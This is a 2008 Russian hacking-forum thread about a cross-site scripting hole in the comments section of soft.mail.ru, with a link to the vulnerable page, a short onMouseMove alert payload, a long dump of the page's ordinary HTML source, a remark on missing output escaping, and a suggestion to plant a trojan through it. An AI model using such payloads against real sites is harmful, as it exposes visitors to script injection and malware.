xss на mail.ru
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
xss на mail.ru - 2008-03-16 22:10:47.503333
|
|
|
heaven7
Сообщений: 134
Оценки: 5
Присоединился: 2007-12-29 20:49:38.910000
|
в поиске я особо не напрягался, кому надо доработают до победного конца http://soft.mail.ru/program_comments.php?grp=44651
|
|
|
RE: xss на mail.ru - 2008-03-16 23:45:12.083333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
<div onMouseMove='alert("alert")' style='height: 100%; width: 100%; background-color: #000000; color: #00FF00'>test</div>
|
|
|
RE: xss на mail.ru - 2008-03-17 12:50:47.176666
|
|
|
Taraseika
Сообщений: 98
Оценки: 0
Присоединился: 2007-09-07 19:32:59.486666
|
Вот исходник страницы с XSS
<html>
<head>
<title>Софт@Mail.Ru: Active Photo Editor : Графические редакторы : Графика и дизайн</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<meta name="description" content="Графический редактор с возможностью создания эффектов. Опции программы: - поддержка форматов: BMP, JPEG, GIF, PNG, ICO; - создание скриншотов экрана - применение различных эффектов к изображению - рисование линий и форм, заливка - устанавка цвета (кисти и холста); ">
<meta name="keywords" content="графический редактор, работа с графикой, обработка фото, создание эффектов, фото эффекты, графика, фото, картинка">
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=windows-1251">
<link rel="stylesheet" type="text/css" href="http://soft.mail.ru/css/index.css" title="CSS">
</head>
<body bgcolor=white leftmargin=0 rightmargin=0 topmargin=0 bottommargin=0 marginheight=0 marginwidth=0>
<center>
<!-- BEGIN:top -->
<style>
table.top_menu td{font-size:80%;padding:2px 0px 4px 0px}
table.top_menu td.bord_r{border-right:1px solid #C2C3CC}
table.top_menu td.bord_l_or {border-left:1px solid #C2C3CC}
table.top_menu td.bord_b {height:1px; padding:0px; background:#C2C3CC url('http://img.mail.ru/1.gif') no-repeat top right;}
table.top_menu td.top_search {padding:0px 1px}
table.top_menu td.top_search form {margin:0px}
table.top_menu td.top_search td.top_search_logo {padding:0px}
table.top_menu td.top_search td.top_search_inp {padding:0px; width:100%}
table.top_menu td.top_search td.top_search_inp input {font-size:95%; width:99%; border:1px solid #9BA3A9; color:#5A5A5A;}
table.top_menu td.top_search td.top_search_but {padding:1px 0 0 0}
table.top_menu td.top_search td.top_search_but input {font-size:85%;width:55px;border:1px solid #9BA3A9; color:#5A5A5A; background:#FFF;}
div#top_menu {height:18px;overflow:hidden; display:block; margin-top:2px;}
div#top_menu a{height:16px;margin-top:0px;margin-right:0px;}
div#top_menu img { margin-right:4px}
</style>
<script>
function inscript (input) {
if (input.value=="") {input.value=' Поиск в Интернете'}
}
function ch() {
document.MSearch.action="http://go.mail.ru/search"
}
</script>
<table width=90% cellpadding=0 cellspacing=0 style="margin:0"><td>
<!--New project menu-->
<table width=100% cellpadding=0 cellspacing=0 class=top_menu>
<tr>
<td class=bord_l_or><img src=http://img.mail.ru/0.gif width=1 height=1></td>
<td id=forGo class=top_search><form action=http://go.mail.ru/ name=MSearch method="get" target="_blank"><input type=hidden name=quick_form value="soft">
<table width=100% cellpadding=0 cellspacing=0 id="_rForm">
<td class=top_search_logo><a href=http://go.mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/go-all.gif width=16 height=16 border=0></a></td>
<td><img src=http://img.mail.ru/0.gif width=3 height=1></td>
<td class=top_search_inp><img src=http://img.mail.ru/1.gif width=130 height=1><br>
<input type=text value=" Поиск в Интернете" onkeyup="ch();" onfocus="this.value='';" onblur="inscript(this);" name=q></td>
<td><img src=http://img.mail.ru/0.gif width=2 height=1></td>
<td class=top_search_but><input type=submit value="Найти" style="height:18px"></td>
</table></form>
<table width=100% cellpadding=0 cellspacing=0 style="display:none" id="_rLink">
<td width=5%><img src=http://img.mail.ru/0.gif width=15 height=1></td>
<td nowrap><a href=http://go.mail.ru/><img src=http://img.mail.ru/mail/ru/images/go-all.gif width=16 height=16 alt="Поиск" border=0 align=absmiddle></a> <a href=http://go.mail.ru/>Поиск</a></td>
</table>
</td>
<td><img src=http://img.mail.ru/0.gif width=15 height=1></td>
<script type="text/javascript">
var projectIconPath = "http://img.mail.ru/mail/ru/images/";
var allProjectsArray = [
["Почта", "http://mail.ru/", "mail-all.gif"],
["Агент", "http://agent.mail.ru/", "agent4-all.gif"],
["Каталог", "http://list.mail.ru/", "list-all.gif"],
["Новости", "http://news.mail.ru/", "news-all.gif"],
["Товары", "http://r.mail.ru/cln3339/torg.mail.ru/", "torg-all.gif"],
["Рейтинг", "http://top.mail.ru/", "top-all.gif"],
["Рассылки", "http://content.mail.ru/", "content-all.gif"],
["Обучение", "http://education.mail.ru/", "edu-all.gif"],
["Товары", "http://r.mail.ru/cln3339/torg.mail.ru/", "torg-all.gif"],
["Авто", "http://auto.mail.ru/", "cars-all.gif"],
["ТВ", "http://tv.mail.ru/", "tv-all.gif"],
["Погода", "http://weather.mail.ru/", "weather-all.gif"],
["Путешествия", "http://travel.mail.ru/", "tour-all.gif"],
["Карты", "http://map.mail.ru/msk/", "map-all.gif"]
];
var projectsHtmlContent = "";
for (i = 0; i < allProjectsArray.length; i++) {
projectsHtmlContent += "<a href=" + allProjectsArray[i][1] + "><img src=" + projectIconPath + allProjectsArray[i][2] + " width=16 height=16 alt=\"" + allProjectsArray[i][0] + "\" border=0 align=absmiddle>" + allProjectsArray[i][0] + "</a>";
}
document.write("\
<td width=\"100%\">\
<div id=top_menu>" + projectsHtmlContent + "</div>\
</td>\
");
</script>
<noscript>
<td nowrap><a href=http://mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/mail-all.gif width=16 height=16 alt="Почта" border=0 align=absmiddle></a> <a href=http://mail.ru/ target=_blank>Почта</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
<td nowrap><a href=http://agent.mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/agent4-all.gif width=16 height=16 alt="Агент" border=0 align=absmiddle></a> <a href=http://agent.mail.ru target=_blank>Агент</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
<td nowrap><a href=http://list.mail.ru/ target=_blank><img src=http://img.mail.ru/ru/images/list-all.gif width=16 height=16 alt="Каталог" border=0 align=absmiddle></a> <a href=http://list.mail.ru target=_blank>Каталог</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
<td nowrap><a href=http://news.mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/news-all.gif width=16 height=16 alt="Новости" border=0 align=absmiddle></a> <a href=http://news.mail.ru/ target=_blank>Новости</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
<td nowrap><a href=http://money.mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/money-all.gif width=16 height=16 alt="Деньги" border=0 align=absmiddle></a> <a href=http://money.mail.ru/ target=_blank>Деньги</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
<td nowrap><a href=http://content.mail.ru/ target=_blank><img src=http://img.mail.ru/mail/ru/images/content-all.gif width=16 height=16 alt="Рассылки" border=0 align=absmiddle></a> <a href=http://content.mail.ru/ target=_blank>Рассылки</a></td>
<td width=5%><img src=http://img.mail.ru/0.gif width=7 height=1></td>
</noscript>
<td nowrap id="forAll"><img src=http://img.mail.ru/0.gif width=5 height=1><a href=http://r.mail.ru/cln2767/mail.ru/all/><b>Все проекты</b></a></td>
<td class=bord_r><img src=http://img.mail.ru/0.gif width=10 height=1></td>
</tr>
<tr><td colspan=99 class=bord_b nowrap><img src=http://img.mail.ru/1.gif width=1 height=1></td></tr>
</table>
<!--/New project menu-->
<img src=http://img.mail.ru/1.gif width=760 height=1><br>
</td></table>
<table width=90% cellpadding=0 cellspacing=0 id=demetion style="margin:0"><td><img src=http://img.mail.ru/1.gif width=760 height=1></td></table>
<script type="text/javascript">
var cashProjectWidth = new Array();
function menu_resize () {
var body90Width = document.getElementById("demetion").offsetWidth;
var bodyWidth = (window.innerWidth) ? window.innerWidth : window.document.body.clientWidth;
if (bodyWidth < 800) {
document.getElementById("_rForm").style.display = "none";
document.getElementById("_rLink").style.display = "";
} else {
document.getElementById("_rForm").style.display = "";
document.getElementById("_rLink").style.display = "none";
}
var searchTd = document.getElementById("forGo").offsetWidth;
var allTd = document.getElementById("forAll").offsetWidth;
var menu = document.getElementById("top_menu");
var menu_width = body90Width - searchTd - allTd - 25;
document.getElementById("top_menu").style.width = menu_width;
var projectCount = menu.childNodes.length;
var marginMinWidth = 10;
if (bodyWidth < 1250) marginMinWidth = 10;
else marginMinWidth = 20;
if (cashProjectWidth.length == 0) {
for(i = 0; i < projectCount; i++) {
cashProjectWidth[i] = menu.childNodes[i].offsetWidth;
}
}
var show_points = 0;
for(i = 0; i < projectCount; i++) {
if (menu_width >= show_points + cashProjectWidth[i] + marginMinWidth) {
show_points += cashProjectWidth[i] + marginMinWidth;
} else break;
}
var show_count = i;
var delta = menu_width - show_points + (show_count + 1)*marginMinWidth;
for(i = 0; i < projectCount; i++) {
if (i < show_count) {
menu.childNodes[i].style.display = "";
menu.childNodes[i].style.marginRight = delta/(show_count + 1);
} else {
menu.childNodes[i].style.display = "none";
menu.childNodes[i].style.marginRight = 0;
}
}
}
menu_resize ();
window.onload = menu_resize;
window.onresize = menu_resize;
</script>
<table height=1 cellspacing=0 cellpadding=0 style="margin-bottom:7px">
<td><!--TopList COUNTER--><script language="JavaScript"><!--
d=document;a='';a+=';r='+escape(d.referrer)
js=10//--></script><script language="JavaScript1.1"><!--
a+=';j='+navigator.javaEnabled()
js=11//--></script><script language="JavaScript1.2"><!--
s=screen;a+=';s='+s.width+'*'+s.height
a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth)
js=12//--></script><script language="JavaScript1.3"><!--
js=13//--></script><script language="JavaScript"><!--
d.write('<img src="http://top.list.ru/counter'+
'?id=2361;js='+js+a+';rand='+Math.random()+
'" height=1 width=1>')
if(js>11)d.write('<'+'!-- ')//--></script><noscript><img
src="http://img.mail.ru/r/dumb.gif"
height=1 width=1 ></noscript><script language="JavaScript"><!--
if(js>11)d.write('--'+'>')//--></script><!--TopList COUNTER--><img src=http://www.tns-counter.ru/V13a****mail_ru/ru/CP1251/tmsec=mail_soft/ width=1 height=1></td></table><!-- END:top -->
<!--Banner - begin-->
<table cellpadding=0 cellspacing=0 border=0 width=90% align="center" >
<td align="center">
<!--слоты верхней шапки-->
<table border=0 cellspacing=0 cellpadding=0 width=100%>
<tr><TD width=100% ALIGN="center" class="t"><img src="http://counter.rambler.ru/top100.cnt?292314" alt="Rambler's Top100" width="1" height="1" border=0></TD></tr>
</table>
</td>
</tr>
</table>
<!--Banner - end-->
<!--header - end-->
<!--Main Part - begin-->
<!-- search - begin-->
<table cellpadding=0 cellspacing=0 border=0 width=90% align="center" id="searchcont">
<tr>
<td width=100% class=header>
<!--<td width=100% class=header style="background:#00468C url('http://soft.mail.ru/img/ny_bg.gif') no-repeat top left">-->
<table cellpadding=0 cellspacing=0 border=0 width=100% height=57 id="poisk">
<tr>
<td style="width:1px; background:url(/img/spacerwhite.gif) no-repeat bottom; vertical-align:top"><img src="/img/spacerwhite.gif" style="width:1px; height:1px"></td>
<td height=57 class=head>
<a href="http://soft.mail.ru"><img src="http://img.soft.mail.ru/soft/img/soft_mail.gif" border=0 width=55 height=20 alt=Софт@Mail.Ru></a><a href="http://mail.ru"><img src="http://img.soft.mail.ru/soft/img/mail.gif" border=0 width=103 height=20 alt=Mail.ru></a><img src="http://img.soft.mail.ru/soft/img/0.gif" width=20 height=20>
</td>
<!--<td height=57 class=head><a href="http://soft.mail.ru"><img src="http://img.soft.mail.ru/soft/img/ny_soft_mail.gif" border=0 width=55 height=57 alt=Софт@Mail.Ru></a><a href="http://mail.ru"><img src="http://img.soft.mail.ru/soft/img/ny_mail.gif" border=0 width=123 height=57 alt=Mail.ru></a><img src="http://img.soft.mail.ru/soft/img/0.gif" width=20 height=20></td>-->
<form onSubmit="return CheckQ(this);" name="MSearch_" action="http://soft.mail.ru/search_result_header.php">
<input name="qs" value="1" type="hidden">
<td align="center" width="100%">
<table cellpadding=0 cellspacing=0 border=0 width="100%">
<INPUT name=qs type=hidden value=1>
<tr valign="top">
<td align="right" height="18" valign="middle"><a href="http://mail.ru/kb/" onClick="document.domain='mail.ru'; window.open('http://mail.ru/kb/index.html?form=MSearch_&text=q_&keymode=2&savemode=0', 'keyb', 'height=360,width=610,toolbar=no,menubar=no,location=no,scrollbars=no,focus=yes,top=50,left=50'); return false;"><img src="http://img.go.mail.ru/search_s_keyb.gif" border="0" height="13" width="14" vspace="2" align="top" alt=""></a> </td>
<td colspan="2"> </td>
<td rowspan="2" align="right" valign="top" nowrap="nowrap" class="white">
<div align="right" style="width:9px;"></div>
</td>
</tr>
<tr valign=middle>
<td class=bg1 width=100% style="padding-left:63px">
<img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=3><br>
<input type=text style="width:100%" class=long name=q_ value="" id="q_"></td>
<td class=bg1><img src="http://img.mail.ru/r/dumb.gif" width=10 border=0 height=1 ></td>
<td class=bg1><img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=3><br><input type="submit" value=" Найти "></td>
</tr>
<tr valign=middle>
<td class=bg1 width=100% colspan=3>
<img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=8><br>
</td>
</tr>
</table>
</td>
</form>
<script language="javascript" type="text/javascript">
<!--
document.getElementById('q_').focus();
//-->
</script>
<td style="padding:5px 0 0 20px" valign="top" align="right">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td align="center" colspan="2" style="padding:3px 10px 0px 0px"><a href="http://www.softline.ru"><img src="http://img.mail.ru/r/dumb.gif" width=10 border=0 height=1 ><img src="http://img.soft.mail.ru/soft/img/softline.gif" border=0 width=130 height=38 alt="Softline - программное обеспечение"></a></td>
</tr>
</table>
</td>
<td style="width:1px; background:url(/img/spacerwhite.gif) no-repeat bottom; vertical-align:top"><img src="/img/spacerwhite.gif" style="width:1px; height:1px"></td>
</tr>
</table>
<table cellspacing="0" cellpadding="0" border="0" width="100%">
<tr>
<td align="left" bgcolor="#ffffff" style="padding-left:260px" id="parentZaklId" >
<style>
/* все потроха для переключаемых табов под строкой поиска */
td.current div.left {background:#004B88 no-repeat url('http://img.mail.ru/1.gif') bottom left; padding-left:1px;}
td.current div.right {background:no-repeat url('http://img.mail.ru/1.gif') bottom right; padding-right:1px;}
td.current div.center{border-bottom:1px solid #004B88; padding:1px 9px 3px 9px; background-color:#004B88; color:#000000;}
td.current div.center a{color:#FFFFFF; font-weight:bold; text-decoration:none;cursor:default;}
td.current div.center a:hover{color:#FFFFFF; text-decoration:none;cursor:default;}
td.common div.left {background:#8098AD no-repeat url('http://img.mail.ru/1.gif') bottom left; padding-left:1px;}
td.common div.right {background:no-repeat url('http://img.mail.ru/1.gif') bottom right; padding-right:1px;}
td.common div.center{border-bottom:1px solid #8098AD; padding:1px 9px 3px 9px; background-color:#FFFFFF; color:#000000;}
td.common div.center a{color:#000000; text-decoration:none;}
td.common div.center a:hover{color:#000000; text-decoration:underline;}
table#allMarkTable td.otv2{padding:2px 7px 2px 0}
table#allMarkTable td.otv2 a{color:#0855A5; text-decoration:underline}
table#allMarkTable td.otv2 a:visited{color:#0855A5; text-decoration:underline}
table#allMarkTable td.otv2 a:hover{color:#F26D00; text-decoration:underline}
table#allMarkTable td.otv1{padding:2px 4px 0 5px}
td.current,td.common {font-size:80%;font-family:arial}
</style>
<!--style=" BEGIN: new bookmarks -->
<table cellpadding=0 cellspacing=0 border=0 align="left" id=allMarkTable >
<tr>
<td id=bookmark_1 class=common><div class=left><div class=right><div class=center><a id=int_href href="http://go.mail.ru/search?q=" onClick="return bookmarkClick(this);">Интернет</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_2 class=common><div class=left><div class=right><div class=center><a id=pic_href href="http://go.mail.ru/search_images?q=" onClick="return bookmarkClick(this);">Картинки</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_3 class=common><div class=left><div class=right><div class=center><a id=video_href href="http://go.mail.ru/search_video?q=" onClick="return bookmarkClick(this);">Видео</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_4 class=common><div class=left><div class=right><div class=center><a id=otvet_href href="http://go.mail.ru/otvet?q=" onClick="return bookmarkClick(this);">Ответы</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_5 class=common><div class=left><div class=right><div class=center><a id=cat_href href="http://search.list.mail.ru/?q=" onClick="return bookmarkClick(this);">Каталог</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_6 class=common><div class=left><div class=right><div class=center><a id=lot_href href="http://search.tovary.mail.ru/?q=" onClick="return bookmarkClick(this);">Товары</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_7 class=current><div class=left><div class=right><div class=center><a id=soft_href href="http://soft.mail.ru/search_result_header.php?searchstring=" onClick="return bookmarkClick(this);">Софт</a></div></div></div></td>
<td width=5><img src=http://img.go.mail.ru/d.gif width=5 height=1></td>
<td id=bookmark_8 class=common><div class=left><div class=right><div class=center><a id=dict_href href="http://multilex.mail.ru/view_dict?lang=4.0er&dict=1common&dict=ComE&dict=Ecn&dict=Fedorov&dict=JurE&dict=MedE&dict=PublE&dict=SocE&dict=StrE&dict=SunE&dict=2common&dict=JurR&dict=MedR&dict=OilR&dict=PhysR&dict=PltR&dict=SunR&selall=on&winword=" onClick="return bookmarkClick(this);">Словари</a></div></div></div></td>
<td width=5><img src=0.gif width=5 height=1></td>
<td id=bookmark_9 class=common style="display:none"><div class=left><div class=right><div class=center><a id=enc_href href=http://r.mail.ru/cln3226/search.enc.mail.ru/search_enc?q= onClick="return bookmarkClick(this);">Энциклопедии</a></div></div></div></td>
<td width=5><img src=0.gif width=5 height=1></td>
<td id=bookmark_10 class=common style="display:none"><div class=left><div class=right><div class=center><a id=map_href href="http://r.mail.ru/cln3329/map.mail.ru/msk/addr.asp?mask=" onClick="return bookmarkClick(this);">Карты</a></div></div></div></td>
</tr></table>
</td>
</tr>
</table>
<!-- END: new bookmarks -->
<script type="text/javascript">
<!--
var globalLink = document.getElementById('soft_href');
/* парсим query_string и подсвечиваем таб */
tab = { web:'bookmark_1', images:'bookmark_2', video:'bookmark_3', otvet:'bookmark_4', list:'bookmark_5', torg:'bookmark_6', soft:'bookmark_7', dict:'bookmark_8',enc:'bookmark_9',maps:'bookmark_10'}
dest = {web:'int_href', images:'pic_href', video:'video_href', otvet:'otvet_href', list:'cat_href', torg:'lot_href', soft:'soft_href', dict:'dict_href',enc:'enc_href',maps:'map_href'}
function Querystring(qs) {
this.params = new Object()
this.get=Querystring_get
if (qs == null)
qs=location.search.substring(1,location.search.length);
if (qs.length == 0) return
// Turn <plus> back to <space>
qs = qs.replace(/\+/g, ' ')
var args = qs.split('&') // parse out name/value pairs separated via &
// разбираем пары name=value
for (var i=0;i<args.length;i++) {
var value;
var pair = args[i].split('=')
var name = unescape(pair[0])
if (pair.length == 2)
value = unescape(pair[1])
else
value = name;
this.params[name] = value;
//alert ('name '+ name + ', value ' + value);
//если таб есть, но он пустой, отмечаем "интернет"
if (name == 'tab' && value == '') {
document.getElementById('bookmark_7').className = 'current';
//если таб есть и он не пустой и td с таким id есть
} else if (name == 'tab' && value != '' && document.getElementById(tab[value])) {
// помечаем интернет обычным классом и т.д.
document.getElementById('bookmark_1').className = 'common';
document.getElementById(tab[value]).className = 'current';
globalLink = document.getElementById(dest[value]);
//alert ('Querystring(), globalLink is ' + globalLink);
// } else if (name == 'tab' && value != '' && !document.getElementById(tab[value])){
// globalLink = document.getElementById('int_href');
}
}
}
// вспомогательная фишка для парсинга query_string
function Querystring_get(key, default_) {
// This silly looking line changes UNDEFINED to NULL
if (default_ == null) default_ = null;
var value=this.params[key]
if (value==null) value=default_;
return value
}
Querystring();
/* -------------------------------------------------------------- */
// формируем строку запроса
function set_query(oElem) {
oElem.href += document.MSearch.q.value;
oElem.href=oElem.href.replace(/\+/g,"%2B");
}
// при сабмите
function CheckQ(oForm) {
var requezd = document.getElementById("q_").value.replace(/\+/g,"%2B");
if (typeof(globalLink) == "undefined"){
globalLink = document.getElementById('soft_href');
}
//alert ('begin CheckQ, globalLink is -> ' + globalLink);/
if (oForm.q_.value.length != 0) {
var sLink = globalLink + requezd;
document.location.href = sLink;
}
// set_query(globalLink);
// alert ('set_query.href = ' + globalLink.href);
return false;
};
/* -------------------------------------------------------------- */
//var globalLink = document.getElementById("int_href");
function bookmarkClick(_a) {
requezd = document.getElementById('q_').value.replace(/\+/g,"%2B");
globalLink = _a;
// alert ("_a = " + _a + "\n requezd => " + requezd + "\n requezd.length = " + requezd.length);
if (requezd.length > 0) {
// alert ("requezd.length > 0");
//set_query(_a);
_a.href = _a + requezd;
} else {
// alert ("bookmarkClick ELSE");
var _td = _a.parentNode.parentNode.parentNode.parentNode;
var count = 1;
while (document.getElementById("bookmark_" + count)) {
if (document.getElementById("bookmark_" + count) == _td) document.getElementById("bookmark_" + count).className = "current";
else document.getElementById("bookmark_" + count).className = "common";
count++;
}
return false;
}
}
// -->
</script>
<script type="text/javascript">
var ns4=document.layers?1:0;
var ie4=document.all?1:0;
var ns6=document.getElementById&&!document.all?1:0;
var opera = false;
if (navigator.appName == "Opera") {
var opera = true;
}
// показываем/прячем табы
//var allMarkWidth = document.getElementById("allMarkTable").offsetWidth;
function showHideMark() {
var curWidth = document.getElementById("parentZaklId").offsetWidth;
//if (ie4) curWidth += 130;
//document.MSearch_.q_.value = curWidth;
var minWidth = 1050; // Enc при 1024 есть
//document.MSearch.q.value = minWidth;
document.getElementById("bookmark_9").style.display = (curWidth > minWidth) ? "" : "none";
minWidth += 27; // Maps при 1280 появлятся карты
document.getElementById("bookmark_10").style.display = (curWidth > minWidth) ? "" : "none";
}
//showHideMark();
window.onload = showHideMark;
window.onresize = showHideMark;
</script>
</td>
</tr>
<tr><td>
<img src="http://img.soft.mail.ru/soft/img/0.gif" width=760 height=1><br>
</td>
</tr>
</table>
<!-- search - end--><!--Навигация Soft.Mail.ru- начало-->
<script language="JavaScript"><!--
function cl(link)
{
img = new Image();
img.src = 'http://www.liveinternet.ru/click?*' + link;
}
//--></script>
<table cellpadding="0" cellspacing="0" border="0" width="90%">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mp2" style="border-top:1px solid #d9d9d9">
<table cellpadding="0" cellspacing="0" border="0" align="center" style="margin-top:1px">
<tr>
<td class="cat" nowrap><a href="/catalogue.php" style="text-decoration:none"><img src="http://img.soft.mail.ru/soft/img/catalogue.gif" width="16" height="16" border="0" alt="Каталог софта" style="margin-right:6px" align="absmiddle"><h1 style="display:inline">КАТАЛОГ</h1></a></td>
</tr>
</table>
</td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/softclub-main.php">СОФТ-КЛУБ</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/developers.php">РАЗРАБОТЧИКАМ</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="http://sysadmin.mail.ru">СИСАДМИН</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/forums.php">ФОРУМЫ</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/competitions.php">КОНКУРСЫ</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/delivery.php">РАССЫЛКИ</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" nowrap><a href="/award2007/" target="_blank">СОФТ ГОДА</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9"><a href="http://allsoft.ru?from=topsfm" target="_blank">МАГАЗИН</a></td>
<td class="m" style="border-bottom:1px solid #d9d9d9" width="100%"> </td>
</tr>
</table>
</td>
<td class="m" style="border-bottom:1px solid #d9d9d9" align="right"><a href="/about.php">О проекте</a> </td>
</tr>
<tr>
<td colspan="10" class="ms2">
<!--Навигация Soft-клуб - начало-->
<table cellpadding="0" cellspacing="0" border="0" class="menu" width="100%">
<tr align="center">
<td nowrap align="left"><a href="/new_prog.php">Новинки</a></td>
<td style="padding-left:7px; padding-right:7px"><b>·</b></td>
<td nowrap><a href="/rating.php">Рейтинги</a></td>
<td style="padding-left:7px; padding-right:7px"><b>·</b></td>
<td nowrap><a href="/reviews.php">Обзоры</a></td>
<td style="padding-left:7px; padding-right:7px"><b>·</b></td>
<td nowrap><a href="/program_week_archive.php">Программы недели</a></td>
<td style="padding-left:7px; padding-right:7px"><b>·</b></td>
<td nowrap><a href="/competitions/sm/">Софт-марафон</a></td>
<td style="padding-left:7px; padding-right:7px"><b>·</b></td>
<td nowrap><a href="/faq.php">FAQ</a></td>
<td nowrap align="right" width="100%"><a href="http://soft.mail.ru/">На главную страницу</a> </td>
</tr>
</table>
<!--Навигация Soft-клуб - конец-->
</td>
</tr>
<tr>
<td colspan="10" class="cor" align="right"><img src="http://img.soft.mail.ru/soft/img/1.gif" width="1" height="1"></td>
</tr>
<tr>
<td colspan="10"><img src="http://img.soft.mail.ru/soft/img/0.gif" width="760" height="1"></td>
</tr>
</table>
<!--Навигация Soft.Mail.ru- конец-->
<table border="0" cellspacing="0" cellpadding="0" width="90%" align="center">
<!--left - begin--><!-- API.inc - начало--><td width=23% valign=top><img src=img/0.gif width=240 height=1><br><!
|
|
|
RE: xss на mail.ru - 2008-03-17 13:18:41.030000
|
|
|
heaven7
Сообщений: 134
Оценки: 5
Присоединился: 2007-12-29 20:49:38.910000
|
Иногда просто удивляешься, ну что, сложно было взять nl2br от htmlspecialchars? Нет, блин, надо было не только допустить ошибку, но ещё и усложноить себе жизнь вытаскиванием из текста различных тегов. Тут, правда, возникают сомнения по поводу использования хпх на поддомене маил.ру
|
|
|
RE: xss на mail.ru - 2008-03-17 15:06:47.253333
|
|
|
Werm_Rolent
Сообщений: 280
Оценки: 0
Присоединился: 2004-08-02 22:39:27
|
прикольно - можна ещё и троянчик вскунть
|
|
|
|
|